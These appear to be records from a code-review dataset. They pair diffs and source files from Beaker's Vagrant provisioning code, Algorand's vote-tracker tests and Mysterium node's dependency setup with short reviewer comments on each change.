self.provider_vfile_section host, options # Backwards compatibility; default to virtualbox Beaker::VagrantVirtualbox.provider_vfile_section(host, options) end def set_ssh_config host, user f = Tempfile.new("#{host.name}") ssh_config = Dir.chdir(@vagrant_path) do stdin, stdout, stderr, wait_thr = Open3.popen3('vagrant', 'ssh-config', host.name) if not wait_thr.value.success? raise "Failed to 'vagrant ssh-config' for #{host.name}" end stdout.read end #replace hostname with ip ssh_config = ssh_config.gsub(/Host #{host.name}/, "Host #{host['ip']}") unless not host['ip'] if host['platform'] =~ /windows/ ssh_config = ssh_config.gsub(/127\.0\.0\.1/, host['ip']) unless not host['ip'] end #set the user ssh_config = ssh_config.gsub(/User vagrant/, "User #{user}") f.write(ssh_config) f.rewind host['ssh'] = {:config => f.path()} host['user'] = user @temp_files << f end def get_ip_from_vagrant_file(hostname) ip = '' if File.file?(@vagrant_file) #we should have a vagrant file available to us for reading f = File.read(@vagrant_file) m = /#{hostname}.*?ip:\s*('|")\s*([^'"]+)('|")/m.match(f) if m ip = m[2] @logger.debug("Determined existing vagrant box #{hostname} ip to be: #{ip} ") else raise("Unable to determine ip for vagrant box #{hostname}") end else raise("No vagrant file found (should be located at #{@vagrant_file})") end ip end def initialize(vagrant_hosts, options) require 'tempfile' @options = options @logger = options[:logger] @temp_files = [] @hosts = vagrant_hosts @vagrant_path = File.expand_path(File.join(File.basename(__FILE__), '..', '.vagrant', 'beaker_vagrant_files', File.basename(options[:hosts_file]))) FileUtils.mkdir_p(@vagrant_path) @vagrant_file = File.expand_path(File.join(@vagrant_path, "Vagrantfile")) end def provision(provider = nil) if !@options[:provision] and !File.file?(@vagrant_file) raise "Beaker is configured with provision = false but no vagrant file was found at #{@vagrant_file}. 
You need to enable provision" end if @options[:provision] #setting up new vagrant hosts #make sure that any old boxes are dead dead dead vagrant_cmd("destroy --force") if File.file?(@vagrant_file) make_vfile @hosts, @options vagrant_cmd("up#{" --provider #{provider}" if provider}") else #set host ip of already up boxes @hosts.each do |host| host[:ip] = get_ip_from_vagrant_file(host.name) end end @logger.debug "configure vagrant boxes (set ssh-config, switch to root user, hack etc/hosts)" @hosts.each do |host| default_user = host['user'] set_ssh_config host, 'vagrant' #copy vagrant's keys to roots home dir, to allow for login as root copy_ssh_to_root host, @options #ensure that root login is enabled for this host enable_root_login host, @options #shut down connection, will reconnect on next exec host.close set_ssh_config host, default_user end hack_etc_hosts @hosts, @options end def cleanup @logger.debug "removing temporory ssh-config files per-vagrant box" @temp_files.each do |f| f.close() end @logger.notify "Destroying vagrant boxes" vagrant_cmd("destroy --force") FileUtils.rm_rf(@vagrant_path) end def vagrant_cmd(args) Dir.chdir(@vagrant_path) do exit_status = 1 Open3.popen3("vagrant #{args}") {|stdin, stdout, stderr, wait_thr| while line = stdout.gets @logger.info(line) end if not wait_thr.value.success? raise "Failed to exec 'vagrant #{args}'" end exit_status = wait_thr.value } if exit_status != 0 raise "Failed to execute vagrant_cmd ( #{args} )" end end end end end
1
8,102
This nil check won't correctly handle the case where forward_ssh_agent is explicitly set to false: the value isn't nil, so the forward_agent line still gets emitted even though it shouldn't be.
voxpupuli-beaker
rb
@@ -521,7 +521,7 @@ func TestVoteTrackerFiltersDuplicateVoteOnce(t *testing.T) { inputVotes[i] = helper.MakeValidVoteAcceptedVal(t, i, next, Val1) expectedOutputs[i] = thresholdEvent{T: none} case i == Num: - inputVotes[i] = voteFilterRequestEvent{RawVote: inputVotes[Num-1].(voteAcceptedEvent).Vote.R} + inputVotes[i] = voteFilterRequestEvent{RawVote: inputVotes[Num-1].(voteAcceptedEvent).Vote.R, Proto: protocol.ConsensusCurrentVersion} expectedOutputs[i] = filteredStepEvent{T: voteFilteredStep} } }
1
// Copyright (C) 2019 Algorand, Inc. // This file is part of go-algorand // // go-algorand is free software: you can redistribute it and/or modify // it under the terms of the GNU Affero General Public License as // published by the Free Software Foundation, either version 3 of the // License, or (at your option) any later version. // // go-algorand is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU Affero General Public License for more details. // // You should have received a copy of the GNU Affero General Public License // along with go-algorand. If not, see <https://www.gnu.org/licenses/>. package agreement import ( "testing" "github.com/stretchr/testify/require" "github.com/algorand/go-algorand/config" "github.com/algorand/go-algorand/protocol" ) // todo: test validity of threshold events (incl. bundles) // todo: test vote weights (and not just number of votes) // make a voteTracker at zero state func makeVoteTrackerZero() listener { return checkedListener{listener: new(voteTracker), listenerContract: new(voteTrackerContract)} } // actual tests func TestVoteTrackerNoOp(t *testing.T) { helper := voteMakerHelper{} helper.Setup() voteAcceptEvent := helper.MakeValidVoteAccepted(t, 0, soft) testCase := determisticTraceTestCase{ inputs: []event{ voteAcceptEvent, }, expectedOutputs: []event{ thresholdEvent{T: none}, }, } voteTrackerAutomata := &ioAutomataConcrete{ listener: makeVoteTrackerZero(), } res, err := testCase.Validate(voteTrackerAutomata) require.NoError(t, err) require.NoErrorf(t, res, "Test case 1 did not validate") } func TestVoteTrackerSoftQuorum(t *testing.T) { helper := voteMakerHelper{} helper.Setup() NumThreshold := soft.threshold(config.Consensus[protocol.ConsensusCurrentVersion]) require.Falsef(t, soft.reachesQuorum(config.Consensus[protocol.ConsensusCurrentVersion], NumThreshold-1), "Test case malformed; generates too many votes") require.Truef(t, soft.reachesQuorum(config.Consensus[protocol.ConsensusCurrentVersion], NumThreshold), "Test case malformed; generates too few votes") inputVotes := make([]event, NumThreshold) expectedOutputs := make([]event, NumThreshold) for i := 0; i < len(inputVotes); i++ { inputVotes[i] = helper.MakeValidVoteAccepted(t, i, soft) expectedOutputs[i] = thresholdEvent{T: none} } // given quorum of soft votes, we expect to see soft threshold expectedOutputs[len(expectedOutputs)-1] = thresholdEvent{T: softThreshold, Proposal: *helper.proposal} testCase := determisticTraceTestCase{ inputs: inputVotes, expectedOutputs: expectedOutputs, } voteTrackerAutomata := &ioAutomataConcrete{ listener: makeVoteTrackerZero(), } res, err := testCase.Validate(voteTrackerAutomata) require.NoError(t, err) require.NoErrorf(t, res, "Threshold event not generated") // now, do the same thing, but have one less vote, so expect no threshold inputVotes = inputVotes[:len(inputVotes)-1] expectedOutputs = expectedOutputs[:len(expectedOutputs)-1] testCaseNoThreshold := determisticTraceTestCase{ inputs: inputVotes, expectedOutputs: expectedOutputs, } voteTrackerAutomata = &ioAutomataConcrete{ listener: makeVoteTrackerZero(), } res, err = testCaseNoThreshold.Validate(voteTrackerAutomata) require.NoError(t, err) require.NoErrorf(t, res, "Threshold event should not have been generated") } // sanity check for cert quorums func TestVoteTrackerCertQuorum(t *testing.T) { helper := voteMakerHelper{} helper.Setup() NumThreshold := 
cert.threshold(config.Consensus[protocol.ConsensusCurrentVersion]) require.Falsef(t, cert.reachesQuorum(config.Consensus[protocol.ConsensusCurrentVersion], NumThreshold-1), "Test case malformed; generates too many votes") require.Truef(t, cert.reachesQuorum(config.Consensus[protocol.ConsensusCurrentVersion], NumThreshold), "Test case malformed; generates too few votes") inputVotes := make([]event, NumThreshold) expectedOutputs := make([]event, NumThreshold) for i := 0; i < len(inputVotes); i++ { inputVotes[i] = helper.MakeValidVoteAccepted(t, i, cert) expectedOutputs[i] = thresholdEvent{T: none} } expectedOutputs[len(expectedOutputs)-1] = thresholdEvent{T: certThreshold, Proposal: *helper.proposal} testCase := determisticTraceTestCase{ inputs: inputVotes, expectedOutputs: expectedOutputs, } voteTrackerAutomata := &ioAutomataConcrete{ listener: makeVoteTrackerZero(), } res, err := testCase.Validate(voteTrackerAutomata) require.NoError(t, err) require.NoErrorf(t, res, "Threshold event not generated") // now, do the same thing, but have one less vote inputVotes = inputVotes[:len(inputVotes)-1] expectedOutputs = expectedOutputs[:len(expectedOutputs)-1] testCaseNoThreshold := determisticTraceTestCase{ inputs: inputVotes, expectedOutputs: expectedOutputs, } voteTrackerAutomata = &ioAutomataConcrete{ listener: makeVoteTrackerZero(), } res, err = testCaseNoThreshold.Validate(voteTrackerAutomata) require.NoError(t, err) require.NoErrorf(t, res, "Threshold event should not have been generated") } // sanity check for next quorums func TestVoteTrackerNextQuorum(t *testing.T) { helper := voteMakerHelper{} helper.Setup() NumThreshold := next.threshold(config.Consensus[protocol.ConsensusCurrentVersion]) require.Falsef(t, next.reachesQuorum(config.Consensus[protocol.ConsensusCurrentVersion], NumThreshold-1), "Test case malformed; generates too many votes") require.Truef(t, next.reachesQuorum(config.Consensus[protocol.ConsensusCurrentVersion], NumThreshold), "Test case malformed; generates too few votes") inputVotes := make([]event, NumThreshold) expectedOutputs := make([]event, NumThreshold) for i := 0; i < len(inputVotes); i++ { inputVotes[i] = helper.MakeValidVoteAccepted(t, i, next) expectedOutputs[i] = thresholdEvent{T: none} } expectedOutputs[len(expectedOutputs)-1] = thresholdEvent{T: nextThreshold, Proposal: *helper.proposal} testCase := determisticTraceTestCase{ inputs: inputVotes, expectedOutputs: expectedOutputs, } voteTrackerAutomata := &ioAutomataConcrete{ listener: makeVoteTrackerZero(), } res, err := testCase.Validate(voteTrackerAutomata) require.NoError(t, err) require.NoErrorf(t, res, "Threshold event not generated") // now, do the same thing, but have one less vote inputVotes = inputVotes[:len(inputVotes)-1] expectedOutputs = expectedOutputs[:len(expectedOutputs)-1] testCaseNoThreshold := determisticTraceTestCase{ inputs: inputVotes, expectedOutputs: expectedOutputs, } voteTrackerAutomata = &ioAutomataConcrete{ listener: makeVoteTrackerZero(), } res, err = testCaseNoThreshold.Validate(voteTrackerAutomata) require.NoError(t, err) require.NoErrorf(t, res, "Threshold event should not have been generated") } // sanity check propose votes don't trigger anything func TestVoteTrackerProposeNoOp(t *testing.T) { helper := voteMakerHelper{} helper.Setup() const NumUpperBound = 2000 inputVotes := make([]event, NumUpperBound) for i := 0; i < len(inputVotes); i++ { inputVotes[i] = helper.MakeValidVoteAccepted(t, i, propose) } // here, each input is a separate test-case for i := 0; i < NumUpperBound; 
i++ { testCase := determisticTraceTestCase{ inputs: inputVotes[i : i+1], expectedOutputs: nil, // we expect the input to panic } voteTrackerAutomata := &ioAutomataConcrete{ listener: makeVoteTrackerZero(), } res, err := testCase.Validate(voteTrackerAutomata) require.NoError(t, err, "A vote with step propose did not result in a precondition violation") require.NoError(t, res, "A vote with step propose did not result in a precondition violation") } } func TestVoteTrackerEquivocatorWeightCountedOnce(t *testing.T) { helper := voteMakerHelper{} helper.Setup() NumThreshold := soft.threshold(config.Consensus[protocol.ConsensusCurrentVersion]) inputVotes := make([]event, NumThreshold) expectedOutputs := make([]event, NumThreshold) for i := 0; i < int(NumThreshold-1); i++ { inputVotes[i] = helper.MakeValidVoteAccepted(t, i, soft) expectedOutputs[i] = thresholdEvent{T: none} } // generate an equivocation inputVotes[NumThreshold-1] = helper.MakeValidVoteAccepted(t, 0, soft) expectedOutputs[NumThreshold-1] = thresholdEvent{T: none} testCase := determisticTraceTestCase{ inputs: inputVotes, expectedOutputs: expectedOutputs, } voteTrackerAutomata := &ioAutomataConcrete{ listener: makeVoteTrackerZero(), } res, err := testCase.Validate(voteTrackerAutomata) require.NoError(t, err) require.NoErrorf(t, res, "Threshold event generated due to equivocation double counting") } func TestVoteTrackerEquivDoesntReemitThreshold(t *testing.T) { helper := voteMakerHelper{} helper.Setup() NumThreshold := soft.threshold(config.Consensus[protocol.ConsensusCurrentVersion]) inputVotes := make([]event, NumThreshold+2) expectedOutputs := make([]event, NumThreshold+2) for i := 0; i < int(NumThreshold); i++ { inputVotes[i] = helper.MakeValidVoteAccepted(t, i, soft) expectedOutputs[i] = thresholdEvent{T: none} } expectedOutputs[NumThreshold-1] = thresholdEvent{T: softThreshold, Proposal: *helper.proposal} // generate an equivocation v := randomBlockHash() equivVal := proposalValue{BlockDigest: v} require.NotEqualf(t, *helper.proposal, equivVal, "Test does not generate equivocating values...") inputVotes[NumThreshold] = helper.MakeValidVoteAcceptedVal(t, 0, soft, equivVal) expectedOutputs[NumThreshold] = thresholdEvent{T: none} // generate one more valid vote inputVotes[NumThreshold+1] = helper.MakeValidVoteAccepted(t, int(NumThreshold+1), soft) expectedOutputs[NumThreshold+1] = thresholdEvent{T: none} testCase := determisticTraceTestCase{ inputs: inputVotes, expectedOutputs: expectedOutputs, } voteTrackerAutomata := &ioAutomataConcrete{ listener: makeVoteTrackerZero(), } res, err := testCase.Validate(voteTrackerAutomata) require.NoError(t, err) require.NoErrorf(t, res, "Extra threshold events generated") } func TestVoteTrackerEquivocationsCount(t *testing.T) { helper := voteMakerHelper{} helper.Setup() // generate an equivocation value pair v1 := randomBlockHash() equivVal1 := proposalValue{BlockDigest: v1} v2 := randomBlockHash() equivVal2 := proposalValue{BlockDigest: v2} require.NotEqualf(t, equivVal1, equivVal2, "Test does not generate equivocating values...") // lets use cert this time... 
NumThreshold := cert.threshold(config.Consensus[protocol.ConsensusCurrentVersion]) TotalThreshold := NumThreshold + NumThreshold - NumThreshold/2 inputVotes := make([]event, NumThreshold+NumThreshold/2) expectedOutputs := make([]event, NumThreshold+NumThreshold/2) // generate threshold/2 non equivocating votes for i := 0; i < int(NumThreshold/2); i++ { inputVotes[i] = helper.MakeValidVoteAcceptedVal(t, i, cert, equivVal1) expectedOutputs[i] = thresholdEvent{T: none} } // generate threshold/2 votes for v2. This shouldn't trigger a threshold event for i := int(NumThreshold / 2); i < int(NumThreshold); i++ { inputVotes[i] = helper.MakeValidVoteAcceptedVal(t, i, cert, equivVal2) expectedOutputs[i] = thresholdEvent{T: none} } // now, for the last threshold/2 votes, have them equivocate for v1. This should generate a threshold event. // we may need to update our test case once we implement early next-vote bottom detection. for i := int(NumThreshold / 2); i < int(NumThreshold); i++ { inputVotes[int(NumThreshold)+i-int(NumThreshold/2)] = helper.MakeValidVoteAcceptedVal(t, i, cert, equivVal1) expectedOutputs[int(NumThreshold)+i-int(NumThreshold/2)] = thresholdEvent{T: none} } expectedOutputs[TotalThreshold-1] = thresholdEvent{T: certThreshold, Proposal: equivVal1} testCase := determisticTraceTestCase{ inputs: inputVotes, expectedOutputs: expectedOutputs, } voteTrackerAutomata := &ioAutomataConcrete{ listener: makeVoteTrackerZero(), } res, err := testCase.Validate(voteTrackerAutomata) require.NoError(t, err) require.NoErrorf(t, res, "Equivocation adversely affected threshold generation") } // same test as before, except equivocations voting v2, v3 should also count towards quorum for v1 func TestVoteTrackerSuperEquivocationsCount(t *testing.T) { helper := voteMakerHelper{} helper.Setup() // generate an equivocation value triplet v1 := randomBlockHash() equivVal1 := proposalValue{BlockDigest: v1} v2 := randomBlockHash() equivVal2 := proposalValue{BlockDigest: v2} v3 := randomBlockHash() equivVal3 := proposalValue{BlockDigest: v3} require.NotEqualf(t, equivVal1, equivVal2, "Test does not generate equivocating values...") require.NotEqualf(t, equivVal2, equivVal3, "Test does not generate equivocating values...") require.NotEqualf(t, equivVal1, equivVal3, "Test does not generate equivocating values...") // lets use cert this time... NumThreshold := cert.threshold(config.Consensus[protocol.ConsensusCurrentVersion]) TotalThreshold := NumThreshold + NumThreshold - NumThreshold/2 inputVotes := make([]event, NumThreshold+NumThreshold/2) expectedOutputs := make([]event, NumThreshold+NumThreshold/2) // generate threshold/2 non equivocating votes for i := 0; i < int(NumThreshold/2); i++ { inputVotes[i] = helper.MakeValidVoteAcceptedVal(t, i, cert, equivVal1) expectedOutputs[i] = thresholdEvent{T: none} } // generate threshold/2 votes for v2. This shouldn't trigger a threshold event for i := int(NumThreshold / 2); i < int(NumThreshold); i++ { inputVotes[i] = helper.MakeValidVoteAcceptedVal(t, i, cert, equivVal2) expectedOutputs[i] = thresholdEvent{T: none} } // now, for the last threshold/2 votes, have them equivocate for v1. This should generate a threshold event. // we may need to update our test case once we implement early next-vote bottom detection. 
for i := int(NumThreshold / 2); i < int(NumThreshold); i++ { inputVotes[int(NumThreshold)+i-int(NumThreshold/2)] = helper.MakeValidVoteAcceptedVal(t, i, cert, equivVal3) expectedOutputs[int(NumThreshold)+i-int(NumThreshold/2)] = thresholdEvent{T: none} } expectedOutputs[TotalThreshold-1] = thresholdEvent{T: certThreshold, Proposal: equivVal1} testCase := determisticTraceTestCase{ inputs: inputVotes, expectedOutputs: expectedOutputs, } voteTrackerAutomata := &ioAutomataConcrete{ listener: makeVoteTrackerZero(), } res, err := testCase.Validate(voteTrackerAutomata) require.NoError(t, err) require.NoErrorf(t, res, "Equivocation adversely affected threshold generation") } // check that SM panics on seeing two quorums func TestVoteTrackerPanicsOnTwoSoftQuorums(t *testing.T) { helper := voteMakerHelper{} helper.Setup() // generate an equivocation value pair v1 := randomBlockHash() equivVal1 := proposalValue{BlockDigest: v1} v2 := randomBlockHash() equivVal2 := proposalValue{BlockDigest: v2} require.NotEqualf(t, equivVal1, equivVal2, "Test does not generate equivocating values...") NumThreshold := soft.threshold(config.Consensus[protocol.ConsensusCurrentVersion]) inputVotes := make([]event, 2*NumThreshold) expectedOutputs := make([]event, 2*NumThreshold) // generate quorum for v1 for i := 0; i < int(NumThreshold); i++ { inputVotes[i] = helper.MakeValidVoteAcceptedVal(t, i, soft, equivVal1) expectedOutputs[i] = thresholdEvent{T: none} } expectedOutputs[NumThreshold-1] = thresholdEvent{T: softThreshold, Proposal: equivVal1} // generate quorum for v2 for i := int(NumThreshold); i < int(2*NumThreshold); i++ { inputVotes[i] = helper.MakeValidVoteAcceptedVal(t, i, soft, equivVal2) expectedOutputs[i] = thresholdEvent{T: none} } // the last output should be a panic. Express this by shortening expected outputs expectedOutputs = expectedOutputs[:2*NumThreshold-1] testCase := determisticTraceTestCase{ inputs: inputVotes, expectedOutputs: expectedOutputs, } voteTrackerAutomata := &ioAutomataConcrete{ listener: makeVoteTrackerZero(), } res, err := testCase.Validate(voteTrackerAutomata) require.NoError(t, err) require.NoErrorf(t, res, "VoteTracker did not panic on seeing two quorums for v1 != v2") } // check that SM panics on seeing soft quorum for bot (currently enforced by contract) func TestVoteTrackerPanicsOnSoftBotQuorum(t *testing.T) { helper := voteMakerHelper{} helper.Setup() // generate an equivocation value pair NumThreshold := soft.threshold(config.Consensus[protocol.ConsensusCurrentVersion]) inputVotes := make([]event, NumThreshold) expectedOutputs := make([]event, NumThreshold) // generate quorum for bot for i := 0; i < int(NumThreshold); i++ { inputVotes[i] = helper.MakeValidVoteAcceptedVal(t, i, soft, bottom) expectedOutputs[i] = thresholdEvent{T: none} } expectedOutputs[NumThreshold-1] = thresholdEvent{T: softThreshold, Proposal: bottom} // the last output should be a panic. Express this by shortening expected outputs expectedOutputs = expectedOutputs[:NumThreshold-1] testCase := determisticTraceTestCase{ inputs: inputVotes, expectedOutputs: expectedOutputs, } voteTrackerAutomata := &ioAutomataConcrete{ listener: makeVoteTrackerZero(), } res, err := testCase.Validate(voteTrackerAutomata) require.NoError(t, err) require.NoErrorf(t, res, "VoteTracker did not panic on seeing soft vote bot quorum") } // check that SM panics on seeing two next quorums, in particular bot, val in same step. 
func TestVoteTrackerPanicsOnTwoNextQuorums(t *testing.T) { helper := voteMakerHelper{} helper.Setup() // generate an equivocation value pair v2 := randomBlockHash() val2 := proposalValue{BlockDigest: v2} require.NotEqualf(t, bottom, val2, "Test does not generate equivocating values...") NumThreshold := next.threshold(config.Consensus[protocol.ConsensusCurrentVersion]) inputVotes := make([]event, 2*NumThreshold) expectedOutputs := make([]event, 2*NumThreshold) // generate quorum for bot for i := 0; i < int(NumThreshold); i++ { inputVotes[i] = helper.MakeValidVoteAcceptedVal(t, i, next, bottom) expectedOutputs[i] = thresholdEvent{T: none} } expectedOutputs[NumThreshold-1] = thresholdEvent{T: nextThreshold, Proposal: bottom} // generate quorum for v2 for i := int(NumThreshold); i < int(2*NumThreshold); i++ { inputVotes[i] = helper.MakeValidVoteAcceptedVal(t, i, next, val2) expectedOutputs[i] = thresholdEvent{T: none} } // the last output should be a panic. Express this by shortening expected outputs expectedOutputs = expectedOutputs[:2*NumThreshold-1] testCase := determisticTraceTestCase{ inputs: inputVotes, expectedOutputs: expectedOutputs, } voteTrackerAutomata := &ioAutomataConcrete{ listener: makeVoteTrackerZero(), } res, err := testCase.Validate(voteTrackerAutomata) require.NoError(t, err) require.NoErrorf(t, res, "VoteTracker did not panic on seeing two quorums for v1 != v2") } func TestVoteTrackerRejectsTooManyEquivocators(t *testing.T) { helper := voteMakerHelper{} helper.Setup() Num := soft.threshold(config.Consensus[protocol.ConsensusCurrentVersion]) inputVotes := make([]event, Num*2) expectedOutputs := make([]event, Num*2) for i := 0; i < int(2*Num); i++ { Val := proposalValue{BlockDigest: randomBlockHash()} inputVotes[i] = helper.MakeValidVoteAcceptedVal(t, int(i/2), soft, Val) expectedOutputs[i] = thresholdEvent{T: none} } // We should now have threshold many equivocators... should have panicked when the last equivocation was seen. 
expectedOutputs[2*Num-2] = thresholdEvent{T: softThreshold, Proposal: inputVotes[2*Num-2].(voteAcceptedEvent).Vote.R.Proposal} expectedOutputs = expectedOutputs[:2*Num-1] testCase := determisticTraceTestCase{ inputs: inputVotes, expectedOutputs: expectedOutputs, } voteTrackerAutomata := &ioAutomataConcrete{ listener: makeVoteTrackerZero(), } res, err := testCase.Validate(voteTrackerAutomata) require.NoError(t, err) require.NoErrorf(t, res, "VoteTracker did not reject too many equivocations") } /* tests for filtering component of vote tracker */ func TestVoteTrackerFiltersDuplicateVoteOnce(t *testing.T) { helper := voteMakerHelper{} helper.Setup() v1 := randomBlockHash() Val1 := proposalValue{BlockDigest: v1} const Num = 10 inputVotes := make([]event, Num+1) expectedOutputs := make([]event, Num+1) for i := 0; i < int(Num+1); i++ { switch { case i < Num: inputVotes[i] = helper.MakeValidVoteAcceptedVal(t, i, next, Val1) expectedOutputs[i] = thresholdEvent{T: none} case i == Num: inputVotes[i] = voteFilterRequestEvent{RawVote: inputVotes[Num-1].(voteAcceptedEvent).Vote.R} expectedOutputs[i] = filteredStepEvent{T: voteFilteredStep} } } testCase := determisticTraceTestCase{ inputs: inputVotes, expectedOutputs: expectedOutputs, } voteTrackerAutomata := &ioAutomataConcrete{ listener: makeVoteTrackerZero(), } res, err := testCase.Validate(voteTrackerAutomata) require.NoError(t, err) require.NoErrorf(t, res, "VoteTracker did not filter duplicate") } func TestVoteTrackerForwardsFirstEquivocation(t *testing.T) { helper := voteMakerHelper{} helper.Setup() const V1Bound = 10 const V2Bound = 20 const V1V2Bound = 30 // generate an equivocation value pair v1 := randomBlockHash() equivVal1 := proposalValue{BlockDigest: v1} v2 := randomBlockHash() equivVal2 := proposalValue{BlockDigest: v2} v3 := randomBlockHash() equivVal3 := proposalValue{BlockDigest: v3} require.NotEqualf(t, equivVal1, equivVal2, "Test does not generate equivocating values...") require.NotEqualf(t, equivVal2, equivVal3, "Test does not generate equivocating values...") require.NotEqualf(t, equivVal1, equivVal3, "Test does not generate equivocating values...") inputVotes := make([]event, V1V2Bound+1) expectedOutputs := make([]event, V1V2Bound+1) for i := 0; i < int(V1V2Bound+1); i++ { switch { case i < V1Bound: // these will eventually equivocate inputVotes[i] = helper.MakeValidVoteAcceptedVal(t, i, next, equivVal1) expectedOutputs[i] = thresholdEvent{T: none} case i == V1Bound: // simple duplicate inputVotes[i] = voteFilterRequestEvent{RawVote: inputVotes[i-1].(voteAcceptedEvent).Vote.R} expectedOutputs[i] = filteredStepEvent{T: voteFilteredStep} case i < V2Bound: // these dont equivocate inputVotes[i] = helper.MakeValidVoteAcceptedVal(t, i, next, equivVal2) expectedOutputs[i] = thresholdEvent{T: none} case i == V2Bound: // simple duplicate rv := inputVotes[i-1].(voteAcceptedEvent).Vote.R inputVotes[i] = voteFilterRequestEvent{RawVote: rv} require.EqualValuesf(t, equivVal2, rv.Proposal, "test case is malformed, filtering incorrect vote") expectedOutputs[i] = filteredStepEvent{T: voteFilteredStep} case i == V2Bound+1: // make sure first equivocation is not filtered voteTwo := helper.MakeValidVoteAcceptedVal(t, V2Bound-1, next, equivVal1) inputVotes[i] = voteFilterRequestEvent{RawVote: voteTwo.Vote.R} expectedOutputs[i] = emptyEvent{} case i < V1V2Bound: // now, add some equivocations inputVotes[i] = helper.MakeValidVoteAcceptedVal(t, i-V2Bound, next, equivVal2) expectedOutputs[i] = thresholdEvent{T: none} case i == V1V2Bound: voteThree := 
helper.MakeValidVoteAcceptedVal(t, 2, next, equivVal3) inputVotes[i] = voteFilterRequestEvent{RawVote: voteThree.Vote.R} expectedOutputs[i] = filteredStepEvent{T: voteFilteredStep} } } testCase := determisticTraceTestCase{ inputs: inputVotes, expectedOutputs: expectedOutputs, } voteTrackerAutomata := &ioAutomataConcrete{ listener: makeVoteTrackerZero(), } res, err := testCase.Validate(voteTrackerAutomata) require.NoError(t, err) require.NoErrorf(t, res, "VoteTracker filtered first equivocation") } func TestVoteTrackerFiltersFutureEquivocations(t *testing.T) { helper := voteMakerHelper{} helper.Setup() const Num = 100 inputVotes := make([]event, Num) expectedOutputs := make([]event, Num) for i := 0; i < int(Num); i++ { switch { case i == 0: Val := proposalValue{BlockDigest: randomBlockHash()} inputVotes[i] = helper.MakeValidVoteAcceptedVal(t, 0, soft, Val) expectedOutputs[i] = thresholdEvent{T: none} case i == 1: // first equivocation should not be filtered Val := proposalValue{BlockDigest: randomBlockHash()} VA := helper.MakeValidVoteAcceptedVal(t, 0, soft, Val) inputVotes[i] = voteFilterRequestEvent{RawVote: VA.Vote.R} expectedOutputs[i] = emptyEvent{} case i == 2: // add an equivocation Val := proposalValue{BlockDigest: randomBlockHash()} inputVotes[i] = helper.MakeValidVoteAcceptedVal(t, 0, soft, Val) expectedOutputs[i] = thresholdEvent{T: none} case i < Num: // future equivocations should be filtered Val := proposalValue{BlockDigest: randomBlockHash()} VA := helper.MakeValidVoteAcceptedVal(t, 0, soft, Val) inputVotes[i] = voteFilterRequestEvent{RawVote: VA.Vote.R} expectedOutputs[i] = filteredStepEvent{T: voteFilteredStep} } } testCase := determisticTraceTestCase{ inputs: inputVotes, expectedOutputs: expectedOutputs, } voteTrackerAutomata := &ioAutomataConcrete{ listener: makeVoteTrackerZero(), } res, err := testCase.Validate(voteTrackerAutomata) require.NoError(t, err) require.NoErrorf(t, res, "VoteTracker did not filter equivocations") } /* Check that machine panics on unknown event */ func TestVoteTrackerRejectsUnknownEvent(t *testing.T) { testCase := determisticTraceTestCase{ inputs: []event{ emptyEvent{}, }, expectedOutputs: []event{}, } voteTrackerAutomata := &ioAutomataConcrete{ listener: &voteTracker{}, // we also want the base machine to panic, so don't wrap in contract } res, err := testCase.Validate(voteTrackerAutomata) require.NoError(t, err) require.NoErrorf(t, res, "VoteTracker did not reject unknown event") }
1
35,523
We could avoid passing proto here, since the threshold calculation isn't needed for filtering.
algorand-go-algorand
go
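A toy Go sketch of the point in the review comment above: duplicate-vote filtering can be keyed purely on who voted in which (round, period, step), and never has to consult consensus parameters, which is why passing proto is avoidable. This is an illustration only, not the agreement package's voteTracker; the type and field names are made up.

package main

import "fmt"

// voteKey identifies a vote without any protocol/consensus parameters:
// duplicate detection only needs the sender and where the vote was cast.
type voteKey struct {
	sender string
	round  uint64
	period uint64
	step   uint64
}

// dupFilter remembers which (sender, round, period, step) slots were seen.
type dupFilter struct {
	seen map[voteKey]bool
}

// filtered reports whether an equivalent vote was already observed and
// records it otherwise. Nothing here consults a protocol version: thresholds
// need consensus parameters, duplicate filtering does not.
func (f *dupFilter) filtered(k voteKey) bool {
	if f.seen == nil {
		f.seen = make(map[voteKey]bool)
	}
	if f.seen[k] {
		return true
	}
	f.seen[k] = true
	return false
}

func main() {
	var f dupFilter
	k := voteKey{sender: "addr1", round: 1, period: 0, step: 2}
	fmt.Println(f.filtered(k)) // false: first time this vote is seen
	fmt.Println(f.filtered(k)) // true: same vote again, filtered
}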
@@ -1040,7 +1040,10 @@ func (di *Dependencies) AllowURLAccess(servers ...string) error { return err } - if config.GetBool(config.FlagKeepConnectedOnFail) { + // Doesn't work as expected because some services share IP address with + // each other and with location oracle which is supposed to be routed + // through VPN tunnel. + if false && config.GetBool(config.FlagKeepConnectedOnFail) { if err := router.AllowURLAccess(servers...); err != nil { return err }
1
/* * Copyright (C) 2018 The "MysteriumNetwork/node" Authors. * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <http://www.gnu.org/licenses/>. */ package cmd import ( "fmt" "net" "net/http" "net/url" "path/filepath" "reflect" "time" "github.com/ethereum/go-ethereum/accounts/keystore" "github.com/ethereum/go-ethereum/common" "github.com/pkg/errors" "github.com/rs/zerolog/log" "github.com/mysteriumnetwork/node/communication/nats" "github.com/mysteriumnetwork/node/config" appconfig "github.com/mysteriumnetwork/node/config" "github.com/mysteriumnetwork/node/consumer/bandwidth" consumer_session "github.com/mysteriumnetwork/node/consumer/session" "github.com/mysteriumnetwork/node/core/auth" "github.com/mysteriumnetwork/node/core/beneficiary" "github.com/mysteriumnetwork/node/core/connection" "github.com/mysteriumnetwork/node/core/connection/connectionstate" "github.com/mysteriumnetwork/node/core/discovery" "github.com/mysteriumnetwork/node/core/discovery/proposal" "github.com/mysteriumnetwork/node/core/ip" "github.com/mysteriumnetwork/node/core/location" "github.com/mysteriumnetwork/node/core/node" nodevent "github.com/mysteriumnetwork/node/core/node/event" "github.com/mysteriumnetwork/node/core/payout" "github.com/mysteriumnetwork/node/core/policy" "github.com/mysteriumnetwork/node/core/port" "github.com/mysteriumnetwork/node/core/quality" "github.com/mysteriumnetwork/node/core/service" "github.com/mysteriumnetwork/node/core/state" "github.com/mysteriumnetwork/node/core/storage/boltdb" 